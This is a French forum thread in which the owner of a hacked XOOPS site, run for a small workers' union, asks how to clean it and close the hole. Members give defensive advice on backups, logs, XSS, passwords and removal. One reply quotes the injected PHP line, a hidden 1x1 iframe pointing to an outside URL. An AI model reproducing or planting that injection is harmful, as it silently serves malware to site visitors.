Mon site est hackés

newweek -  
Le-Vengeur-Masqué Messages postés 184 Statut Membre -
Bonjour,

Mon site www.fdt-sdp.com relaisé par xoops 3.2.1 (traduction arabe) à été hacké …les malfaiteurs ont ajouter une iframe dans chaque fichier index.php du site (noyau et module) ..
Comment je dois faire maintenant pour :
Nettoyer mon site
Trouver la faille et la corriger
Faire une sécurité renfoncée de mon site
A voir également:

6 réponses

Le-Vengeur-Masqué Messages postés 184 Statut Membre 3
 
Bonjour, il a été hacké par qui ? ou quelle team ?
0
newweek
 
je ne sais pas qui , mais il sont injecter cette iframe dans mes index
echo "<iframe src=\"http://internetcountercheck.com/?click=85262671\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
0
kryoportail Messages postés 230 Statut Membre 125
 
Salut,

L'important est pas qui mais comment...
Dire qui s'est leur fera de la pub... et ils seront encore plus fier de leur bêtise....

1. Je sauverais ma base de données maintenant !
2. Je tenterais de comprendre comment ils ont fait, je chercherais vers une XSS : https://fr.wikipedia.org/wiki/Cross-site_scripting, regarde les logs de ton serveur....
3. Tu retires la faille qui leur on permit de modifier le code de tes pages... Change tes mots de passe d'administration...
4. Tu retires le code malicieux inséré dans tes pages....

Bon courage... je n'aimerais pas être à ta place....

Amicalement,
S@M...
0
newweek
 
merci cher ami
le maleur que c'est un site d'une syndicat des petits ouvriers ........
ce n'nest ni commercial ni ......
0
newweek
 
comment je px connaitre la faille sachons que j'est pas encore etudier le code de xoops ni des ses modules
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
kryoportail Messages postés 230 Statut Membre 125
 
Re,

As tu sauvé tes fichiers, et ta base de données...

Je te conseillerai presque d'arrêter ton serveur ou de le rendre inaccessible le temps que tu répares... car apparemment la iframe diffuse un virus....

Amicalement
S@M...
0
Le-Vengeur-Masqué Messages postés 184 Statut Membre 3
 
Ma question n'était pas innocente, en sachant par qui on peut trouver comment et c'est du vécu.
0